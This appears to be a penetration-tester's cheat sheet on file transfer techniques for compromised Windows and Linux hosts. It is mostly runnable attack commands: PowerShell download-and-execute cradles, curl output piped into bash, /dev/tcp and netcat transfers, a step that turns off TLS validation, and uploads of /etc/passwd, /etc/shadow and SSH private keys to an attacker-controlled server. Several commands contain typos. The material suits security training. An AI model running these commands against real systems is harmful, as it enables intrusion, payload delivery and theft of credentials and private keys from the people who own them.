🗄️File Transfers

Windows Methods Downloading

PowerShell Base64

Linux

• Check MD5 Hash:

  • md5sum id_rsa

• Encode the file in base64:

  • cat id_rsa | base64 -w 0;echo

  • output: LS0tl1.........Z1

PowerShell

• Decode:

  • [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<BASE64_STRING>")

• Check MD5 hash:

  • id_rsa -Alorithm md5

PowerShell Web Downloads

HTTP and HTTPS outbound traffic is usually allowed through a firewall.

In PowerShell, we can use the System.Net.WebClient command to download a file.

Method	Description
OpenRead	Returns the data from a resource as a Stream.
OpenReadAsync	Returns the data from a resource without blocking the calling thread.
DownloadData	Downloads data from a resource and returns a Byte array.
DownloadDataAsync	Downloads data from a resource and returns a Byte array without blocking the calling thread.
DownloadFile	Downloads data from a resource to a local file.
DownloadFileAsync	Downloads data from a resource to a local file without blocking the calling thread.
DownloadString	Downloads a String from a resource and returns a String.
DownloadStringAsync	Downloads a String from a resource without blocking the calling thread.

File Download

(New-Object Net.WebClient).DownloadFile('<File-URL>','<Output-File-Name>')
(New-Object Net.WebClient).DownloadFileAsync('<File-URL>','<Output-File-Name>')

Download String (Fileless)

IEX (New-Object Net.WebClient).DownloadString('<STRING>')

Web Request

Invoke-WebRequest <FILE.ps1> -OutFile PowerView.ps1

Other Types

PowerShell Cradles

Common Errors

if Internet Explorer has not been configured we can bypass this using the -UseBasicParsing

If we get an SSL/TLS certificate is not trusted we can bypass it with:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Download

First, create an SMB server using Impacket

• sudo impacket-smbserver share -smb2support /tmp/share

Window later version blocks guest access

To authenticate add the params:

• -user <USER>

• -password <PASS>

To download a file

• copy \\<IP>\share\file.exe

Mount a SMB server

• net use n: \\<IP>\share /user:<USER> <PASS>

FTP Download

We start by configuring a FTP server

• sudo pip3 install pyftpdlib

• sudo python3 -m pyftpdlib --port 21

Transfer files using PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\Users\Public\<FILE>')

If we don't have an interactive shell then we can make a FTP command file

echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
open 192.168.49.128
Log in with USER and PASS first.
USER anonymous
GET file.txt
bye

Uploads

Encoding File using PowerShell

[Convert]::ToBase64String((Get-Content -path "C:\<FILE>" -Encoding byte))

Decode using Linux

echo <STRING> | base64 -d > host

PowerShell Web Uploads

Doesn't have a built-in function for uploads.

We can use Invoke-WebRequest

First, we need to set up the web server

pip3 install uploadserver

python3 -m uploadserver

PowerShell to upload a file to the Python Upload Server

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
[+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373

PowerShell Base64 Upload

PS script to upload a file to Python

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

Linux Methods

Encode a file with base64

cat id_rsa | base64 -w 0;echo

Then decode

echo -n '<STRING>' | base64 -d > id_rsa

Downloading Files

Wget

wget http://<URL>/file.ext -O /tmp/file.ext

Curl

curl -o /tmp/file.sh http://<URL>/path/file.sh

Bash

If other tools are not available we can use Bash

Connect to a target Web server

exec 3<>/dev/tcp/<IP>/<PORT>

HTTP GET

echo -e "GET /script.sh HTTP/1.1\n\n">&3

Print Response

cat <&3

Fileless Downloads

Gets executed immediately with Bash in this case

curl http:<IP>/script.sh | bash

wget -q0 http://<URL>/path/file.py | python3

SSH

scp <user>@<IP>:/root/filex.txt .

Web Uploads

Upload server for HTTPS

sudo python3 -m pip install --user uploadserver

Create a self-signed certificate

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

Start Server

sudo python3 -m uploadserver 43 --server-certificate /root/server.pem

Upload Multiple Files

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecur

SSH Upload

scp /etc/passwd <USER>@<IP>:/home/passwd

Transfer with Code

One Liners

With Python, we can use the -c option to run commands

Python2 Download

python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Python3 Download

python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Uploading:

python3 -m uploadserver
python3 -c 'import requests;requests.post("http:<IP>:8000/upload",files={"files":open("/etc/passwd","rb")})'

PHP

With PHP we can use the -r option to run commands

Downloading with file_get_contents

php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Download with fopen

php -r 'const BUFFER = 1024; $fremote = 
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

Download a file and pipe to Bash

php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby Download

ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl Download

perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

JavaScript

// wget.js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

Run in Windows and Download

 cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

VBScript

# wget.vbs
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

Download a file in Windows

cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1

Miscellaneous Methods

Netcat

Listening and Downloading

nc -l -p 4444 > file.exe

Sending a file

nc -q 0 10.10.120.10 8000 < file.exe

Sending file as Input to Netcat

sudo nc -l -p 443 -q 0 < file.exe

Receive File

nc <IP> 443 > file.txt

Ncat

Listening and Downloading

ncat -l -p 4444 --recv-only > file.exe

Sending a File

ncat --send-only 192.168.49.128 8000 < file.exe

Sending a file as Input to Ncat

sudo ncat -l -p 443 --send-only < file.exe

Receive File

cat < /dev/tcp/<IP>/443 > file.exe

RDP

Mounting a Linux Folder using xfreerdp

xfreerdp /v:10.10.10.132 /d:DC/u:user/p:'password' /drive:linux,/home/user/

File Encryption

Windows

One of the easiest methods is using this PowerShell script

PowerShell Gallery | Functions/Invoke-AESEncryption.ps1 4.0.2.3www.powershellgallery.com

PS > Import Module .\Invoke-AESEncryption.ps1

PS > Invoke-AESEncryption -Mode Encrypt -Key "password" -Path .\sensitive-info.txt

Linux

Using OpenSSL with the aes256 encryption

Encryption:

openssl enc -aes256 -iter 100000 -pkbdf2 -in /etc/passwd -out passwd.enc

enter aes-256-cbc encryption password:                                                         
Verifying - enter aes-256-cbc encryption password:

Decryption:

openssl enc -d -aes256 -iter 100000 -pkbdf2 -in passwd.enc -out passwd

enter aes-256-cbc decryption password:

Useful Tools

Uploading files and grabbing them without any setup

https://ufile.io/ufile.io